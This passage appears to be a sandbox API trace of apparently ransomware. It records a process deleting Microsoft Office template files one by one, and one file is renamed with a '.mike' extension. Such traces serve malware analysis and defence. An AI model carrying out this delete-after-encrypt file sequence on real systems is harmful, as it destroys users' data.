Office\\Templates\\1033\\ClassicPhotoAlbum.potx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\classicphotoalbum.potx")) returned 1 [0088.231] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0088.303] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ContemporaryPhotoAlbum.potx", dwFileAttributes=0x80) returned 1 [0088.303] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ContemporaryPhotoAlbum.potx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\contemporaryphotoalbum.potx")) returned 1 [0088.310] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0088.325] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\EquityLetter.Dotx", dwFileAttributes=0x80) returned 1 [0088.326] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\EquityLetter.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\equityletter.dotx")) returned 1 [0088.330] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0088.339] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\EquityMergeFax.Dotx", dwFileAttributes=0x80) returned 1 [0088.339] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\EquityMergeFax.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\equitymergefax.dotx")) returned 1 [0088.342] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0088.359] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\EquityMergeLetter.Dotx", dwFileAttributes=0x80) returned 1 [0088.359] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\EquityMergeLetter.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\equitymergeletter.dotx")) returned 1 [0088.363] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0088.574] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\EquityReport.Dotx", dwFileAttributes=0x80) returned 1 [0088.574] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\EquityReport.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\equityreport.dotx")) returned 1 [0088.583] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0088.614] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\EquityResume.Dotx", dwFileAttributes=0x80) returned 1 [0088.614] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\EquityResume.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\equityresume.dotx")) returned 1 [0088.620] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0088.631] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\EssentialLetter.dotx", dwFileAttributes=0x80) returned 1 [0088.631] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\EssentialLetter.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\essentialletter.dotx")) returned 1 [0088.635] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0088.648] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\EssentialMergeLetter.dotx", dwFileAttributes=0x80) returned 1 [0088.648] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\EssentialMergeLetter.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\essentialmergeletter.dotx")) returned 1 [0088.652] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0088.752] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\EssentialReport.dotx", dwFileAttributes=0x80) returned 1 [0088.753] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\EssentialReport.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\essentialreport.dotx")) returned 1 [0088.761] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0088.792] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\EssentialResume.dotx", dwFileAttributes=0x80) returned 1 [0088.792] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\EssentialResume.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\essentialresume.dotx")) returned 1 [0088.797] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0088.811] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ExecutiveLetter.dotx", dwFileAttributes=0x80) returned 1 [0088.811] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ExecutiveLetter.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\executiveletter.dotx")) returned 1 [0088.814] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0088.822] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ExecutiveMergeLetter.dotx", dwFileAttributes=0x80) returned 1 [0088.823] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ExecutiveMergeLetter.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\executivemergeletter.dotx")) returned 1 [0088.826] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0088.850] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ExecutiveNewsletter.dotx", dwFileAttributes=0x80) returned 1 [0088.850] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ExecutiveNewsletter.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\executivenewsletter.dotx")) returned 1 [0088.854] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0088.952] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ExecutiveReport.dotx", dwFileAttributes=0x80) returned 1 [0088.953] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ExecutiveReport.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\executivereport.dotx")) returned 1 [0088.962] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0088.971] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ExecutiveResume.dotx", dwFileAttributes=0x80) returned 1 [0088.972] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ExecutiveResume.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\executiveresume.dotx")) returned 1 [0088.975] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0088.981] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ExpenseReport.xltx", dwFileAttributes=0x80) returned 1 [0088.981] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ExpenseReport.xltx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\expensereport.xltx")) returned 1 [0088.984] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0091.526] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\FiveRules.potx.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Templates\\1033\\FiveRules.potx.mike", lpFilePart=0x0) returned 0x44 [0094.355] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\FiveRules.potx", dwFileAttributes=0x80) returned 1 [0094.356] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\FiveRules.potx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\fiverules.potx")) returned 1 [0094.366] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0096.801] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\IntroducingPowerPoint2010.potx", dwFileAttributes=0x80) returned 1 [0096.802] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\IntroducingPowerPoint2010.potx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\introducingpowerpoint2010.potx")) returned 1 [0096.825] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0096.834] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\LoanAmortization.xltx", dwFileAttributes=0x80) returned 1 [0096.835] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\LoanAmortization.xltx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\loanamortization.xltx")) returned 1 [0096.838] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0096.849] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\MedianLetter.Dotx", dwFileAttributes=0x80) returned 1 [0096.849] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\MedianLetter.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\medianletter.dotx")) returned 1 [0096.852] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0096.863] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\MedianMergeFax.Dotx", dwFileAttributes=0x80) returned 1 [0096.863] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\MedianMergeFax.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\medianmergefax.dotx")) returned 1 [0096.868] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0096.880] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\MedianMergeLetter.Dotx", dwFileAttributes=0x80) returned 1 [0096.881] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\MedianMergeLetter.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\medianmergeletter.dotx")) returned 1 [0096.884] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0096.923] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\MedianReport.Dotx", dwFileAttributes=0x80) returned 1 [0096.923] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\MedianReport.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\medianreport.dotx")) returned 1 [0096.928] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0096.944] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\MedianResume.Dotx", dwFileAttributes=0x80) returned 1 [0096.945] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\MedianResume.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\medianresume.dotx")) returned 1 [0096.948] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0096.957] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Office Word 2003 Look.dotx", dwFileAttributes=0x80) returned 1 [0096.957] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Office Word 2003 Look.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\office word 2003 look.dotx")) returned 1 [0096.960] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0096.980] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OrielLetter.Dotx", dwFileAttributes=0x80) returned 1 [0096.980] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OrielLetter.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\orielletter.dotx")) returned 1 [0096.984] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0096.994] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OrielMergeFax.Dotx", dwFileAttributes=0x80) returned 1 [0096.994] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OrielMergeFax.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\orielmergefax.dotx")) returned 1 [0096.999] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0097.023] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OrielMergeLetter.Dotx", dwFileAttributes=0x80) returned 1 [0097.023] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OrielMergeLetter.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\orielmergeletter.dotx")) returned 1 [0097.027] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0097.087] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OrielReport.Dotx", dwFileAttributes=0x80) returned 1 [0097.087] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OrielReport.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\orielreport.dotx")) returned 1 [0097.094] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0097.207] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OrielResume.Dotx", dwFileAttributes=0x80) returned 1 [0097.207] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OrielResume.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\orielresume.dotx")) returned 1 [0097.213] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0097.227] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OriginLetter.Dotx", dwFileAttributes=0x80) returned 1 [0097.227] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OriginLetter.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\originletter.dotx")) returned 1 [0097.230] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0097.241] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OriginMergeFax.Dotx", dwFileAttributes=0x80) returned 1 [0097.241] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OriginMergeFax.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\originmergefax.dotx")) returned 1 [0097.244] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0097.257] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OriginMergeLetter.Dotx", dwFileAttributes=0x80) returned 1 [0097.257] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OriginMergeLetter.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\originmergeletter.dotx")) returned 1 [0097.260] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0097.367] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OriginReport.Dotx", dwFileAttributes=0x80) returned 1 [0097.367] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OriginReport.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\originreport.dotx")) returned 1 [0097.373] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0097.386] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OriginResume.Dotx", dwFileAttributes=0x80) returned 1 [0097.387] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OriginResume.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\originresume.dotx")) returned 1 [0097.390] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0097.397] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\PersonalMonthlyBudget.xltx", dwFileAttributes=0x80) returned 1 [0097.397] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\PersonalMonthlyBudget.xltx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\personalmonthlybudget.xltx")) returned 1 [0097.400] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0097.422] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Pitchbook.potx", dwFileAttributes=0x80) returned 1 [0097.423] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Pitchbook.potx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\pitchbook.potx")) returned 1 [0097.426] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0097.514] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ProjectStatusReport.potx", dwFileAttributes=0x80) returned 1 [0097.515] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ProjectStatusReport.potx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\projectstatusreport.potx")) returned 1 [0097.523] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0097.528] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\PROJPLAN.XLTX", dwFileAttributes=0x80) returned 1 [0097.528] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\PROJPLAN.XLTX" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\projplan.xltx")) returned 1 [0097.532] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: 